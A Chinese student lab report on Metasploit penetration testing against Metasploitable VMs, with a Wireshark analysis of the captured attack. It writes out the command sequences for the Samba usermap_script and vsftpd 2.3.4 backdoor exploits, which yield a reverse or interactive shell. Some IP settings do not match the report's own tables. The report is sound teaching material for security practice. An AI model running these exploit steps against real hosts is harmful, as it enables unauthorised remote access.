1.实践内容
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.实践过程
2.1使用Metasploit进行Linux远程渗透攻击
Kali作为攻击机,Meta作为靶机
虚拟机 | IP Address |
---|---|
kali | 192.168.200.5 |
meta | 192.168.200.123 |
使用Kali,在终端启动metasploit,如图所示:
然后输入 use exploit/multi/samba/usermap_script,使用usermap_script漏洞,随后输入 show payloads显示所有可用载荷。
通过使用命令 set payload 20,随后设置攻击参数
通过show options,查看详细信息
然后使用exploit开始攻击,成功。
2.2 实践作业:攻防对抗实践
2.2.1攻击实验
虚拟机 | IP |
---|---|
meta (Mary) | 192.168.239.35 |
kali (田) | 192.168.239.225 |
检验二者之间的连通性,可以ping通.
使用以下命令进行目标主机(靶机)的漏洞扫描
sudo nmap -sV -p 192.168.239.35
依次执行以下代码:
msfconsole
use exploit/multi/samba/usermap_script
show payloads
set payload cmd/unix/reverse
set LHOST 192.168.137.22
set RHOST 192.168.137.62
show options
exploit
通过 msfconsole,可以访问各种模块和工具,执行渗透测试任务,探索系统漏洞,以及执行各种网络攻击和漏洞利用
查看漏洞信息:
进行设置:
抓包:
2.2.3防御实验
本次实验的成员及虚拟机信息如下:
虚拟机 | IP |
---|---|
kali (mary) | 192.168.239.160 |
meta (tian) | 192.168.239.140 |
首先进行连通性测试,可以相互ping通:
之后在kali上扫描靶机漏洞
输入search vsftpd查看漏洞信息
输入命令use exploit/unix/ftp/vsftpd_234_backdoor进入漏洞所在文件,输入show options查看攻击此漏洞需要的设置
通过使用 set payload/cmd/unix/interact命令设置此次攻击,然后,输入set LHOST 192.168.200.2 、set RHOST 192.168.200.124
设置进行攻击的主机为kali,受到攻击的主机为meta
输入run命令进行攻击,成功之后输入whoami查看权限,输入ifconfig查看靶机网络信息
在进行攻击时打开wireshark输入ip.addr192.168.239.140 and ip.addr192.168.239.160进行捕包,可以看出攻击机IP地址为192.168.239.160,靶机IP地址为192.168.239.140,攻击的端口为21
查看tcp流可以看到攻击机的命令和攻击时用到的漏洞信息
3.学习中遇到的问题及解决
- 问题1:第二个实验,漏洞可能有问题,打不通
- 问题1解决方案:下载了新的虚拟机linux2.0
- 问题2:改为桥接模式后IP地址不改变
- 问题2解决方案:重启!
4.实践总结
耐心,多尝试。和上次实验有相似之处,可参考。
参考资料
- https://www.cnblogs.com/wongyoho/p/12743218.html
- https://blog.csdn.net/qq_53198713/article/details/138182025?spm=1001.2014.3001.5501